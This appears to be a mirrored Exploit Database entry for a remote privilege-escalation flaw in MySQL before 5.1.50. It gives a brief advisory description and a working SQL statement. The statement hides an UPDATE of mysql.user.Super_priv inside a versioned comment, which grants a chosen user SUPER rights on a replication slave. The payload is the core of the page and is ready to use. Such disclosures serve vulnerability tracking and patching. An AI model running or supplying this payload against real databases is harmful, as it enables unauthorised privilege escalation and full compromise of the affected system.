Oracle MySQL < 5.1.50 - Privilege Escalation

• Exploit Database
• 17 阅读

• 作者： Libing Song
  日期： 2010-08-03
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/34796/

• source: https://www.securityfocus.com/bid/43677/info
  
  MySQL is prone to a remote privilege-escalation vulnerability.
  
  An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.
  
  This issue affects versions prior to MySQL 5.1.50. 
  
  UPDATE db1.tbl1 /*!514900 ,mysql.user */
  SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
  WHERE mysql.user.User='user1'*/;